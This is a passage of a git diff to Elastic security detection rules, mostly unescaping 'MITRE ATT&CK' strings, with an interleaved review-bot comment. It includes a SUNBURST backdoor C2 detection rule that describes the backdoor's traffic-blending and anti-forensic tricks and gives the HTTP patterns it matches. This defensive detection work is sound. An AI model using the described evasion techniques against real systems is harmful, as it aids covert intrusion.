\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_3.json b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_3.json
index 504bc6e26e4..ac4918bde95 100644
--- a/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_3.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_4.json b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_4.json
index f3bee61c2ce..e5b871f3a6e 100644
--- a/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_4.json
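Review bot: `google_workspace.token.scope.data.scope_name` is declared with `"type": "unknown"` in `required_fields`, yet the `query` relies on a leading-wildcard match against it (`*Login`), and likewise on `*apps.googleusercontent.com` for `google_workspace.token.client.id`; on a keyword field a leading wildcard is a full-term scan, while on a text field it matches analysed tokens rather than the whole value, so the rule's match semantics depend on a mapping this file does not pin down. If the integration maps `scope_name` as keyword, change that entry to `"type": "keyword"`; otherwise the `setup` string should state which mapping the rule assumes. Also, with `new_terms_fields` on the client id and a `history_window_start` of `now-15d`, a third-party application not seen in the last 15 days will presumably alert again as "first time seen" — worth one sentence in `note` so analysts do not read every hit as a genuinely new application. The file is also written without a trailing newline.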
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -89,7 +89,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_5.json b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_5.json
index 9e9f5228dd3..eab0133a4b2 100644
--- a/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_5.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_102.json b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_102.json
index b99d04d39cc..207738b3763 100644
--- a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_102.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_103.json b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_103.json
index 5e227238575..98143a60398 100644
--- a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_103.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -76,7 +76,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_104.json b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_104.json
index 9ae13941163..6481112224c 100644
--- a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_104.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_204.json b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_204.json
index 3ab4df605f8..5dc7d43e636 100644
--- a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_204.json
+++ b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_204.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_104.json b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_104.json
index ed254e07f71..5d8afd013ed 100644
--- a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_104.json
@@ -11,7 +11,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "SUNBURST Command and Control Activity",
- "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. 
The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "network where host.os.type == \"windows\" and event.type == \"protocol\" and network.protocol == \"http\" and\n process.name : (\"ConfigurationWizard.exe\",\n \"NetFlowService.exe\",\n \"NetflowDatabaseMaintenance.exe\",\n \"SolarWinds.Administration.exe\",\n \"SolarWinds.BusinessLayerHost.exe\",\n \"SolarWinds.BusinessLayerHostx64.exe\",\n \"SolarWinds.Collector.Service.exe\",\n \"SolarwindsDiagnostics.exe\") and\n (\n (\n (http.request.body.content : \"*/swip/Upload.ashx*\" and http.request.body.content : (\"POST*\", \"PUT*\")) or\n (http.request.body.content : (\"*/swip/SystemDescription*\", \"*/swip/Events*\") and http.request.body.content : 
(\"GET*\", \"HEAD*\"))\n ) and\n not http.request.body.content : \"*solarwinds.com*\"\n )\n",
 "references": [
 "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_105.json b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_105.json
index d375aa1d867..4ca6fa75975 100644
--- a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_105.json
@@ -11,7 +11,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "SUNBURST Command and Control Activity",
- "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 
'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "network where host.os.type == \"windows\" and event.type == \"protocol\" and network.protocol == \"http\" and\n process.name : (\"ConfigurationWizard.exe\",\n \"NetFlowService.exe\",\n \"NetflowDatabaseMaintenance.exe\",\n \"SolarWinds.Administration.exe\",\n \"SolarWinds.BusinessLayerHost.exe\",\n \"SolarWinds.BusinessLayerHostx64.exe\",\n \"SolarWinds.Collector.Service.exe\",\n \"SolarwindsDiagnostics.exe\") and\n (\n (\n (http.request.body.content : \"*/swip/Upload.ashx*\" and http.request.body.content : (\"POST*\", \"PUT*\")) or\n (http.request.body.content : (\"*/swip/SystemDescription*\", \"*/swip/Events*\") and http.request.body.content : (\"GET*\", \"HEAD*\"))\n ) and\n not http.request.body.content : \"*solarwinds.com*\"\n )\n",
 "references": [
 "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_106.json b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_106.json
index 820a2cb182c..6b40d7efa56 100644
--- a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_106.json
@@ -11,7 +11,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "SUNBURST Command and Control Activity",
- "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 
'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n> **Note**:\n> This 